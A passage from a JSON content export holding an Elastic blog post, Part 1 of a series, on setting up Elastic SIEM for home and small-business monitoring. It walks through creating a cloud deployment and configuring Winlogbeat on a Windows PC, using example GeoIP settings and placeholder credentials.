management","keyword":"log-management","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:42:23.694Z","updated_at":"2023-11-06T20:42:23.694Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.358Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":null,"title":"Managing Relations Inside Elasticsearch","title_l10n":"Managing Relations Inside Elasticsearch","updated_at":"2024-09-16T16:52:01.057Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/managing-relations-inside-elasticsearch","versions":["Pre 1"],"publish_details":{"time":"2024-09-16T16:52:04.690Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt088a3617a5774531","_version":60,"locale":"en-us","ACL":{},"abstract_l10n":"Elastic SIEM is a great way to provide security analytics and monitoring capabilities to small businesses and homes. Check out Part 1 of this series on SIEM for home networks and small businesses.","author":["blt8808bafb12228a0e"],"body_l10n":"\u003cp\u003eWith the increase in cyber attacks and data breaches, we’re told to be vigilant in regards to keeping sensitive data safe. But when it comes to cybersecurity, being proactive is just as important. Knowing what is happening to our information systems helps us identify how we should improve our information security posture. This is why \u003ca href=\"https://www.elastic.co/security/siem\" target=\"_self\"\u003esecurity analytics\u003c/a\u003e are important.\u003c/p\u003e\u003cp\u003eFor medium to large businesses, cybersecurity requires a budget, adequate staff, and appropriate tools to protect and defend against cyber attacks. These tools include a \u003ca href=\"https://www.elastic.co/what-is/siem\" target=\"_self\"\u003esecurity information and event management (SIEM) solution\u003c/a\u003e to analyze logs from devices in their environment. But for small businesses and homes, having access to effective security analytics can come at a high cost of either time or money. Well, until now.\u003c/p\u003e\u003cp\u003eIntroduced in 7.2, \u003ca href=\"/products/siem\" target=\"_self\"\u003eElastic SIEM\u003c/a\u003e is a great way to provide security analytics and monitoring capabilities to small businesses and homes with limited time and resources. It’s also great for large businesses, but for the sake of this blog series, we’re going to stay focused on smaller implementations.\u003c/p\u003e\u003cp\u003eIn this \u003cstrong\u003eElastic SIEM for home networks and small business\u003c/strong\u003e blogs series, we’ll cover two use cases:\u003c/p\u003e\u003cul\u003e\u003cli\u003eA small business with 15 employees that normally work in a centralized office, where employees also have remote access\u003c/li\u003e\u003cli\u003eA home user, who is also an “IT guru,” that monitors security at home and also helps out family members (including relatives who do not live nearby)\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eTo make this as simple as possible, we will use the Elasticsearch Service. You’ll be able to spin up a \u003ca href=\"/products/elasticsearch/service\" target=\"_self\"\u003efree 14-day trial\u003c/a\u003e if you don’t already have a cluster. It is worth noting that in Elasticsearch Service, your cluster is referred to as a deployment. Alternatively, you can \u003ca href=\"/start\" target=\"_self\"\u003einstall the Elastic Stack locally\u003c/a\u003e, since Elastic SIEM is free with our default distribution — but this blog won’t cover that install.\u003c/p\u003e\u003ch2\u003eMeet Elastic SIEM\u003c/h2\u003e\u003cp\u003eAs we go through the blog series and add devices to our Elasticsearch Service deployment, we will be able to see data in the new SIEM app. Here is an example of the Hosts and Network pages from an environment with seven systems:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt00777cdd77c73361/5daf4e076af83b6d7032c1da/home-siem-blog-1-host-overview.png\" data-sys-asset-uid=\"blt00777cdd77c73361\" alt=\"Elastic SIEM host overview example\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eExample of the SIEM Hosts page\u003cbr /\u003e\u003c/figcaption\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt61401e6a0b283c8e/5daf4e17bd24496c390adcaf/home-siem-blog-1-network-overview.png\" data-sys-asset-uid=\"blt61401e6a0b283c8e\" alt=\"Elastic SIEM network overview example\"/\u003e\u003c/p\u003e\u003cfigcaption\u003eExample of the SIEM Network page\u003c/figcaption\u003e\u003cp\u003eAs we go through the series, we will walk through how to collect data from different devices and ship them to our Elasticsearch Service deployment. Over the next few posts, we’ll explore that data within Elastic SIEM. Our goal is to cover the following topics:\u003c/p\u003e\u003cul\u003e\u003cli\u003eAdding GeoIP data to our network events\u003c/li\u003e\u003cli\u003eSecuring access to our Elastic cluster\u003c/li\u003e\u003cli\u003eConfiguring data collection from Windows and Linux devices\u003c/li\u003e\u003cli\u003eCollecting firewall and DNS Server data\u003c/li\u003e\u003cli\u003eVisualizing GeoIP data in Elastic Maps. We will also leverage the \u003ca href=\"/products/maps\" target=\"_self\"\u003eElastic Maps\u003c/a\u003e app for more advanced visualizations of our data (even though version 7.4 of the Elastic Stack includes maps in the SIEM app).\u003c/li\u003e\u003cli\u003eConfiguring additional data sources and tackling more advanced use cases\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eHere’s an example of one of the visualizations that you’ll be able to create after running through these blogs:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt024c26b7636cb24f/5daf4e293a326d6df6c0e025/home-siem-blog-1-map.jpg\" data-sys-asset-uid=\"blt024c26b7636cb24f\" alt=\"Elastic SIEM data on Elastic Maps\"/\u003e\u003c/p\u003e\u003cp\u003eOk, let’s learn more about the environments of our two use cases, create our Elasticsearch Service deployment, and finalize a few technical items that will be relevant. Once our Elasticsearch Service deployment is ready, we will go over the process of configuring data collection from our workstations, laptops, and network devices in follow-up blogs in this series.\u003c/p\u003e\u003ch2\u003eIdentifying our data collection needs\u003c/h2\u003e\u003cp\u003eBefore we download, install, or configure anything, we need to determine our data collection needs. We also need to determine our GeoIP data so we will be able to leverage maps capabilities in either the Elastic SIEM app or the Elastic Maps app. For devices in scope, we will include all desktop computers and laptops, and also include the Windows and Linux servers our small business has.\u003c/p\u003e\u003cp\u003eFor data collection from our servers, workstations, and laptops, we will use some of the \u003ca href=\"/products/beats/\" target=\"_self\"\u003eElastic Beats\u003c/a\u003e applications. We need to collect log files, activities of users and processes, and network data. We need to determine which of the Beats applications meet our needs, since our use cases have both Windows and Linux devices. At a high level, here is an overview of each of the Elastic Beats:\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/products/beats/auditbeat\" target=\"_self\"\u003eAuditbeat\u003c/a\u003e - Audit the activities of users and processes (mainly for Linux systems)\u003c/li\u003e\u003cli\u003e\u003ca href=\"/products/beats/filebeat\" target=\"_self\"\u003eFilebeat\u003c/a\u003e - Monitors the log files or locations that you specify, collects log events\u003c/li\u003e\u003cli\u003e\u003ca href=\"/products/beats/heartbeat\" target=\"_self\"\u003eHeartbeat\u003c/a\u003e - Monitor services for their availability with active probing\u003c/li\u003e\u003cli\u003e\u003ca href=\"/products/beats/metricbeat\" target=\"_self\"\u003eMetricbeat\u003c/a\u003e - Collect metrics from the operating system and running services\u003c/li\u003e\u003cli\u003e\u003ca href=\"/products/beats/packetbeat\" target=\"_self\"\u003ePacketbeat\u003c/a\u003e - Real-time network packet analyzer\u003c/li\u003e\u003cli\u003e\u003ca href=\"/products/beats/winlogbeat\" target=\"_self\"\u003eWinlogbeat\u003c/a\u003e - Windows-specific event log shipping agent\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eBased on this overview, we will need to collect data using Auditbeat, Filebeat, Packetbeat, and Winlogbeat by \u003ca href=\"/downloads/beats\" target=\"_self\"\u003edownloading\u003c/a\u003e and configuring these data shipping applications.\u003c/p\u003e\u003cp\u003eThe first device we will configure is a Windows computer for our small business use case, this system is located in a shared office where users sign in with their own personal account. For our home setup use case, we will start with the device my kids use. In this blog, we will configure \u003cem\u003edefault\u003c/em\u003e collection of Windows events using Winlogbeat; later on in the blog series, we will update the configuration to cover our use cases.\u003c/p\u003e\u003cp\u003eRegarding Beats configurations, we need to keep in mind that the configurations for Beats have shared general configurations (each with their own specific settings in addition to the general configurations), so we will use the configurations from our first system when we deploy Beats to our other systems.\u003c/p\u003e\u003cp\u003eNow that we have determined our initial data collection needs, we can create our Elasticsearch Service deployment.\u003c/p\u003e\u003ch2\u003eCreating our Elasticsearch Service deployment\u003c/h2\u003e\u003cp\u003eFirst, we will sign up for \u003ca href=\"https://cloud.elastic.co/\" target=\"_self\"\u003eElasticsearch Service\u003c/a\u003e and create our first deployment. We will start the \u003ca href=\"/cloud/elasticsearch-service/signup?elektra=ess-pricing\" target=\"_self\"\u003e14-day free trial\u003c/a\u003e that starts the moment we create our cluster. It is worth noting that in Elasticsearch Service, your cluster is referred to as a deployment. Upon logging in and launching our trial successfully, we will create our first deployment, select our cloud platform, and select a region. Next, we will select the latest available version, then select I/O Optimized, then we will click ‘Create deployment’. During deployment creation, we’re given the credentials to access Elasticsearch and Kibana. Save these credentials locally for future use.\u003c/p\u003e\u003ctable style=\"background-image: initial;background-position-x: initial;background-position-y: initial;background-size: initial;background-repeat-x: initial;background-repeat-y: initial;background-attachment: initial;background-origin: initial;background-clip: initial;background-color: rgb(255, 255, 210);\"\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003eIf you are already a non-trial Elasticsearch Service user, you have access to hot-warm templates during deployment. Hot-warm is the recommended deployment model for Elastic SIEM. As your deployment grows, you should review some guidance around \u003ca href=\"/blog/sizing-hot-warm-architectures-for-logging-and-metrics-in-the-elasticsearch-service-on-elastic-cloud\" target=\"_self\"\u003esizing your cluster\u003c/a\u003e, over time consider \u003ca href=\"/guide/en/cloud/current/ec-migrate-templates.html\" target=\"_self\"\u003emigrating your deployment\u003c/a\u003e to the hot/warm template, and review the \u003ca href=\"/products/elasticsearch/service/pricing\" target=\"_self\"\u003eElasticsearch Service pricing calculator\u003c/a\u003e.\u003cbr /\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003eNext, we click on the “your deployment” link. Since additional information is needed before configuring, we configure shipping data from our devices.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc3bc74f7cae353e5/5daf4ef856458c6b3fc16ed9/home-siem-blog-1-deployment.png\" data-sys-asset-uid=\"bltc3bc74f7cae353e5\" alt=\"Deploying the Elasticsearch Service\"/\u003e\u003c/p\u003e\u003cp\u003eIn addition to the endpoint to access the Kibana web UI, we’ll need to copy the Cloud ID as it is required to send data from \u003ca href=\"/guide/en/cloud/current/ec-cloud-id.html#ec-cloud-id\" target=\"_self\"\u003eBeats to our Elasticsearch Service deployment\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6ba1beddb8e7a0d8/5daf6e5289fb926b491ed196/siem-blog-1_deployment_overview.png\" data-sys-asset-uid=\"blt6ba1beddb8e7a0d8\" alt=\"My Elasticsearch Service deployment details\"/\u003e\u003c/p\u003e\u003cp\u003eBefore we configure any of our systems to send data to our Elasticsearch Service deployment, we have a few housekeeping items to take care of first. Let’s first make sure we have our elastic superuser credentials and our Cloud ID.\u003c/p\u003e\u003ch2\u003eDetermining our GeoIP data\u003c/h2\u003e\u003cp\u003eBefore we install and configure Beats, we’ll want to decide whether we’re going to add GeoIP data to each of the Beats configurations, since we will use this data in the configuration files. For the purpose of the blog, our small business (or home) is in New York City, our location is 40.7128 latitude and -74.0060 longitude, our continent is North America, our country’s ISO code is US, our region name is New York, and our region ISO code is US-NY.\u003c/p\u003e\u003cp\u003eWith that said, the GeoIP information for our hosts will be:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eprocessors: \u003cbr /\u003e - add_host_metadata:\u003cbr /\u003e netinfo.enabled: true\u003cbr /\u003e Geo: # These Geo configurations are optional\u003cbr /\u003e location: 40.7128, -74.0060\u003cbr /\u003e continent_name: North America\u003cbr /\u003e country_iso_code: US\u003cbr /\u003e region_name: New York\u003cbr /\u003e region_iso_code: US-NY\u003cbr /\u003e city_name: New York City\u003cbr /\u003e name: myLocation\u003cbr /\u003e - add_locale: ~ \u003cbr /\u003e - add_cloud_metadata: ~ \u003cbr /\u003e - add_fields: \u003cbr /\u003e when.network.source.ip: private \u003cbr /\u003e fields: \u003cbr /\u003e source.geo.location: \u003cbr /\u003e lat: 40.7128 \u003cbr /\u003e lon: -74.0060 \u003cbr /\u003e source.geo.continent_name: North America\u003cbr /\u003e source.geo.country_iso_code: US\u003cbr /\u003e source.geo.region_name: New York\u003cbr /\u003e source.geo.region_iso_code: US-NY\u003cbr /\u003e source.geo.city_name: New York City\u003cbr /\u003e source.geo.name: myLocation\u003cbr /\u003e target: '' \u003cbr /\u003e - add_fields: \u003cbr /\u003e when.network.destination.ip: private \u003cbr /\u003e fields: \u003cbr /\u003e destination.geo.location: \u003cbr /\u003e lat: 40.7128 \u003cbr /\u003e lon: -74.0060 \u003cbr /\u003e destination.geo.continent_name: North America\u003cbr /\u003e destination.geo.country_iso_code: US\u003cbr /\u003e destination.geo.region_name: New York\u003cbr /\u003e destination.geo.region_iso_code: US-NY\u003cbr /\u003e destination.geo.city_name: New York City\u003cbr /\u003e destination.geo.name: myLocation\u003cbr /\u003e target: ''\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eWhile we will see this repeated in our configuration files, they are important because they allow our Beats to tell Elasticsearch where our private networks exist on a map.\u003c/p\u003e\u003cp\u003eNow that we have our GeoIP data ready to go, let’s start installing and configuring Beats on our first home computer.\u003c/p\u003e\u003ch2\u003eOur initial Winlogbeat configuration\u003c/h2\u003e\u003cp\u003eSince we’ve downloaded Winlogbeat, we will read through the \u003ca href=\"/guide/en/beats/winlogbeat/7.4/winlogbeat-installation.html\" target=\"_self\"\u003eWinlogbeat installation guide\u003c/a\u003e to get started. We’ve extracted the files to C:\\Program Files\\Elastic\\winlogbeat-7.4.0\\ (I’ve kept the version number in the folder name for my own version control) and have opened an Administrative PowerShell session. We’ll install the service by issuing the .\\install-service-winlogbeat.ps1 command (shown below).\u003c/p\u003e\u003cp\u003eAfter installing Winlogbeat, \u003cstrong\u003edo not\u003c/strong\u003e start the service until we finish initial configuration.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePS C:\\\u0026gt; cd C:\\Program Files\\Elastic\\winlogbeat-7.4.0\\ \u003cbr /\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt; .\\install-service-winlogbeat.ps1 \u003cbr /\u003eSecurity warning \u003cbr /\u003eRun only scripts that you trust. While scripts from the internet can be useful, \u003cbr /\u003ethis script can potentially harm your computer. If you trust this script, use \u003cbr /\u003ethe Unblock-File cmdlet to allow the script to run without this warning message. \u003cbr /\u003eDo you want to run C:\\Program Files\\Winlogbeat\\install-service-winlogbeat.ps1? \u003cbr /\u003e[D] Do not run [R] Run once [S] Suspend [?] Help (default is “D”): R \u003cbr /\u003eStatus Name DisplayName \u003cbr /\u003e------ ---- ----------- \u003cbr /\u003eStopped winlogbeat winlogbeat \u003cbr /\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt;\u003cbr /\u003e\u003c/pre\u003e\u003ch4\u003eError: cannot be loaded because running scripts is disabled on this system\u003c/h4\u003e\u003ctable style=\"background-image: initial;background-position-x: initial;background-position-y: initial;background-size: initial;background-repeat-x: initial;background-repeat-y: initial;background-attachment: initial;background-origin: initial;background-clip: initial;background-color: rgb(255, 255, 210);\"\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cstrong\u003eNote:\u003c/strong\u003e If you receive a .\\install-service-winlogbeat.ps1 : File C:\\Program Files\\Elastic\\winlogbeat-7.4.0\\install-service-winlogbeat.ps1 cannot be loaded because running scripts is disabled on this system. error, you will need to issue the Unblock-File command against the install-service-winlogbeat.ps1 file, as shown below, before issuing the .\\install-service-winlogbeat.ps1 command.\u003cbr /\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cpre class=\"prettyprint\"\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt; .\\install-service-winlogbeat.ps1 \u003cbr /\u003e.\\install-service-winlogbeat.ps1 : File C:\\Program Files\\Elastic\\winlogbeat-7.4.0\\install-service-winlogbeat.ps1 \u003cbr /\u003ecannot be loaded because running scripts is disabled on this system. For more information, see \u003cbr /\u003eabout_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170. \u003cbr /\u003eAt line:1 char:1 \u003cbr /\u003e+ .\\install-service-winlogbeat.ps1 \u003cbr /\u003e+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \u003cbr /\u003e + CategoryInfo : SecurityError: (:) [], PSSecurityException \u003cbr /\u003e + FullyQualifiedErrorId : UnauthorizedAccess \u003cbr /\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt; Unblock-File .\\install-service-winlogbeat.ps1 \u003cbr /\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt;\u003cbr /\u003e\u003c/pre\u003e\u003ch3\u003eSysmon module\u003c/h3\u003e\u003cp\u003eGenerally, we would use the \u003ca href=\"/guide/en/beats/winlogbeat/7.4/winlogbeat-module-sysmon.html\" target=\"_self\"\u003eSysmon module\u003c/a\u003e in Winlogbeat, which requires that we install \u003ca href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon\" target=\"_self\"\u003eSysinternals System Monitor (Sysmon)\u003c/a\u003e. Note that \u003ca href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon\" target=\"_self\"\u003eSysmon\u003c/a\u003e is not bundled with Windows or Winlogbeat and must be installed independently. The installation of Sysmon and configuration of the \u003ca href=\"/guide/en/beats/winlogbeat/7.4/winlogbeat-module-sysmon.html\" target=\"_self\"\u003eSysmon module\u003c/a\u003e will be covered in a later blog.\u003c/p\u003e\u003ch3\u003eUpdating the Winlogbeat configuration\u003c/h3\u003e\u003cp\u003eOnce Winlogbeat is installed on this Windows computer, we will update the configuration file and initialize/setup Winlogbeat to ship to Elasticsearch Service (using our \u003ca href=\"/guide/en/cloud/current/ec-cloud-id.html#ec-cloud-id\" target=\"_self\"\u003eCloud ID\u003c/a\u003e). We will also update the configuration file to include additional metadata to identify this computer. For authentication to our Elasticsearch Service deployment, we will use the default elastic superuser account; please note the format is “username:password” in the configuration file. In a later blog, we will update this to use an account with more restricted access and limit the use of our superuser account.\u003c/p\u003e\u003cp\u003eWith that said, here is what I have set in winlogbeat.yml for our initial configuration:\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e#=== Winlogbeat specific options ===\u003cbr /\u003ewinlogbeat.event_logs:\u003cbr /\u003e - name: Application\u003cbr /\u003e ignore_older: 72h\u003cbr /\u003e - name: System\u003cbr /\u003e - name: Security\u003cbr /\u003e processors:\u003cbr /\u003e - script:\u003cbr /\u003e lang: javascript\u003cbr /\u003e id: security\u003cbr /\u003e file: ${path.home}/module/security/config/winlogbeat-security.js\u003cbr /\u003e#=== General ===\u003cbr /\u003ename: KidsPC\u003cbr /\u003etags: [“Home”, “KidsPC”]\u003cbr /\u003efields:\u003cbr /\u003e env: home\u003cbr /\u003e#=== Top Level Processor ===\u003cbr /\u003eprocessors:\u003cbr /\u003e - add_host_metadata:\u003cbr /\u003e netinfo.enabled: true\u003cbr /\u003e Geo: # These Geo configurations are optional\u003cbr /\u003e location: 40.7128, -74.0060\u003cbr /\u003e continent_name: North America\u003cbr /\u003e country_iso_code: US\u003cbr /\u003e region_name: New York\u003cbr /\u003e region_iso_code: US-NY\u003cbr /\u003e city_name: New York City\u003cbr /\u003e name: myHomeLocation\u003cbr /\u003e - add_locale: ~\u003cbr /\u003e - add_cloud_metadata: ~\u003cbr /\u003e - add_fields:\u003cbr /\u003e #when.network.source.ip: 10.101.101.0/24\u003cbr /\u003e when.network.source.ip: private\u003cbr /\u003e fields:\u003cbr /\u003e source.geo.location:\u003cbr /\u003e lat: 40.7128\u003cbr /\u003e lon: -74.0060\u003cbr /\u003e source.geo.continent_name: North America\u003cbr /\u003e source.geo.country_iso_code: US\u003cbr /\u003e source.geo.region_name: New York\u003cbr /\u003e source.geo.region_iso_code: US-NY\u003cbr /\u003e source.geo.city_name: New York City\u003cbr /\u003e source.geo.name: myLocation\u003cbr /\u003e target: ''\u003cbr /\u003e - add_fields:\u003cbr /\u003e #when.network.destination.ip: 10.101.101.0/24\u003cbr /\u003e when.network.destination.ip: private\u003cbr /\u003e fields:\u003cbr /\u003e destination.geo.location:\u003cbr /\u003e lat: 40.7128\u003cbr /\u003e lon: -74.0060\u003cbr /\u003e destination.geo.continent_name: North America\u003cbr /\u003e destination.geo.country_iso_code: US\u003cbr /\u003e destination.geo.region_name: New York\u003cbr /\u003e destination.geo.region_iso_code: US-NY\u003cbr /\u003e destination.geo.city_name: New York City\u003cbr /\u003e destination.geo.name: myLocation\u003cbr /\u003e target: ''\u003cbr /\u003e#=== Elastic Cloud ===\u003cbr /\u003e# Use the Cloud ID to ship data from Beats to Elasticsearch Service \u003cbr /\u003e# /guide/en/cloud/current/ec-cloud-id.html#ec-cloud-id\u003cbr /\u003e# You can find the `cloud.id` in the Elasticsearch Service web UI.\u003cbr /\u003ecloud.id: “My_Elastic_Cloud_Deployment:abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ”\u003cbr /\u003e# The cloud.auth format is `\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;`\u003cbr /\u003e# For production, we should NOT use the elastic superuser\u003cbr /\u003ecloud.auth: “elastic:0987654321abcDEF” # example: “username:password”\u003cbr /\u003e#=== Xpack Monitoring ===\u003cbr /\u003emonitoring.enabled: true\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eAs a reminder, let’s keep the settings in the General, Top Level Processor, Elastic Cloud, and Xpack Monitoring sections nearby so we can use them for configuring the other Beats. For reference, these \u003ca href=\"https://github.com/elastic/examples/tree/master/Security%20Analytics/SIEM-at-Home\" target=\"_self\"\u003eexample configurations\u003c/a\u003e can be found in the \u003ca href=\"https://github.com/elastic/examples\" target=\"_self\"\u003eexamples GitHub repo\u003c/a\u003e under \u003ca href=\"https://github.com/elastic/examples/tree/master/Security%20Analytics/SIEM-at-Home\" target=\"_self\"\u003eSecurity Analytics/SIEM-at-Home\u003c/a\u003e. Once the file is updated, don’t forget to save the changes made to winlogbeat.yml.\u003c/p\u003e\u003ch3\u003eSetting Winlogbeat up with Elasticsearch Service\u003c/h3\u003e\u003cp\u003eNow that the configuration is updated with our Elasticsearch Service information and our host metadata, it is time to set up Winlogbeat with our Elasticsearch Service deployment. Running the setup command only needs to be performed once for each beat. In our Administrative PowerShell session, we’ll issue the .\\winlogbeat.exe setup command then confirm we receive “Index setup finished” and “Loaded dashboards” messages (shown below).\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt; .\\winlogbeat.exe setup \u003cbr /\u003eIndex setup finished. \u003cbr /\u003eLoading dashboards (Kibana must be running and reachable) \u003cbr /\u003eLoaded dashboards \u003cbr /\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt;\u003cbr /\u003e\u003c/pre\u003e\u003ch3\u003eRunning Winlogbeat as a service\u003c/h3\u003e\u003cp\u003eNow that we’ve set up the index and loaded the dashboards, it is time to start the Winlogbeat service! In our Administrative PowerShell session, we will issue the Start-Service winlogbeat command (see below) to begin collecting the Windows application, system, and security logs from this device.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt; Start-Service winlogbeat \u003cbr /\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt; Get-Service winlogbeat \u003cbr /\u003eStatus Name DisplayName \u003cbr /\u003e------ ---- ----------- \u003cbr /\u003eRunning winlogbeat winlogbeat \u003cbr /\u003ePS C:\\Program Files\\Elastic\\winlogbeat-7.4.0\u0026gt; cd .. \u003cbr /\u003ePS C:\\Program Files\\Elastic\u0026gt;\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eWe will navigate back to the C:\\Program Files\\Elastic folder in our Administrative PowerShell session, which we can use to continue installing and configuring Beats on this Windows device as we go through this blog series (and using the getting started guides).\u003c/p\u003e\u003ch2\u003eAccessing our Elasticsearch Service deployment\u003c/h2\u003e\u003cp\u003eNow that we have our first data source shipping data to our Elasticsearch Service deployment, we can sign into the Kibana instance of our Elasticsearch Service deployment so we can see what data is available in the SIEM app. In Kibana, click on SIEM where we will be taken to the Overview page. Once in the Overview page, we can click on Hosts for more detail on the data populated in the SIEM app:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb4aec400098c9e76/5daf4f4389fb926b491ed0f8/home-siem-blog-1-hosts.png\" data-sys-asset-uid=\"bltb4aec400098c9e76\" alt=\"My data in the Elastic SIEM Hosts page\"/\u003e\u003c/p\u003e\u003cp\u003eNow we’ll click on KidsPC so we can see more information specific to this system:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt2acf4fc0ca727443/5daf4f7556458c6b3fc16edf/home-siem-blog-1-kidspc.png\" data-sys-asset-uid=\"blt2acf4fc0ca727443\" alt=\"First data source host overview\"/\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3df1fabce7f4fe32/5daf4fb1347d1c6baa57b75c/home-siem-blog-1-auths.png\" data-sys-asset-uid=\"blt3df1fabce7f4fe32\" alt=\"First data source user authentications\"/\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf8cd1664cdb785b5/5daf501cdf78486c826dc5e4/home-siem-blog-1-ips.png\" data-sys-asset-uid=\"bltf8cd1664cdb785b5\" alt=\"First data source unique IPs\"/\u003e\u003c/p\u003e\u003cp\u003eNext let’s click on the Network page within the SIEM app:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt73b07ea109f7b56d/5daf50616e8b0c6d038c5567/home-siem-blog-1-network.png\" data-sys-asset-uid=\"blt73b07ea109f7b56d\" alt=\"My data in the Elastic SIEM Network page\"/\u003e\u003c/p\u003e\u003cp\u003eThis is a great start to providing visibility into what our device is doing.\u003c/p\u003e\u003ch2\u003eComing up in Part 2: Securing cluster access\u003c/h2\u003e\u003cp\u003eOur next steps are to complete a few prerequisites, which will secure access to our cluster by restricting privileges for users and Beats. Then we need to configure our cluster to enrich data with GeoIP information. After that, we will review our beats configurations. Once those items are complete, we will install and configure beats on the rest of our systems so we can see what is happening throughout our network.\u003c/p\u003e\u003cp\u003eFollow us through this \u003cstrong\u003eElastic SIEM for home networks and small business\u003c/strong\u003e blog series as we develop a powerful, yet simple, security solution at home (or for your small business):\u003c/p\u003e\u003cul\u003e\u003cli\u003ePart 1: Getting started\u003c/li\u003e\u003cli\u003ePart 2: \u003ca href=\"https://www.elastic.co/blog/elastic-siem-for-small-business-and-home-2-securing-cluster-access\" target=\"_self\"\u003eSecuring cluster access\u003c/a\u003e\u003c/li\u003e\u003cli\u003ePart 3: \u003ca href=\"https://www.elastic.co/blog/elastic-siem-for-small-business-and-home-3-geoip-data-and-beats-config-review\" target=\"_self\"\u003eGeoIP data and Beats config\u003c/a\u003e\u003c/li\u003e\u003cli\u003ePart 4: \u003ca href=\"https://www.elastic.co/blog/elastic-siem-for-small-business-and-home-4-beats-on-windows\" target=\"_self\"\u003eBeats on Windows\u003c/a\u003e\u003c/li\u003e\u003cli\u003ePart 5: \u003ca href=\"https://www.elastic.co/blog/elastic-siem-for-small-business-and-home-5-beats-on-centos\" target=\"_self\"\u003eBeats on CentOS\u003c/a\u003e\u003c/li\u003e\u003cli\u003ePart 6: \u003ca href=\"https://www.elastic.co/blog/elastic-siem-for-small-business-and-home-6-beats-on-mac\" target=\"_self\"\u003eBeats on macOS\u003c/a\u003e\u003c/li\u003e\u003cli\u003ePart 7: \u003ca href=\"https://www.elastic.co/blog/elastic-siem-for-small-business-and-home-7-siem-overview\" target=\"_self\"\u003eSIEM overview\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003ch2\u003eA few last things...\u003c/h2\u003e\u003cp\u003eIf you run into any issues, the first place we’d recommend turning is to our \u003ca href=\"/guide/index.html\" target=\"_self\"\u003edocumentation\u003c/a\u003e. It can help with many common issues. If you still have outstanding questions, check out our \u003ca href=\"https://discuss.elastic.co/\" target=\"_self\"\u003eElastic forums\u003c/a\u003e for additional help. Or, if you want to talk to the Elastic Support team directly, you have direct access to a team of experts if you’ve deployed on \u003ca href=\"/cloud/\" target=\"_self\"\u003eElasticsearch Service\u003c/a\u003e. If you are self-hosting, you can start an \u003ca href=\"/subscriptions\" target=\"_self\"\u003eElastic subscription\u003c/a\u003e today and have direct access to a team of experts. Be safe out there!\u003c/p\u003e\u003cp\u003eTo learn more, check out our \u003ca href=\"https://www.elastic.co/what-is/siem\" target=\"_self\"\u003eWhat Is SIEM? Overview 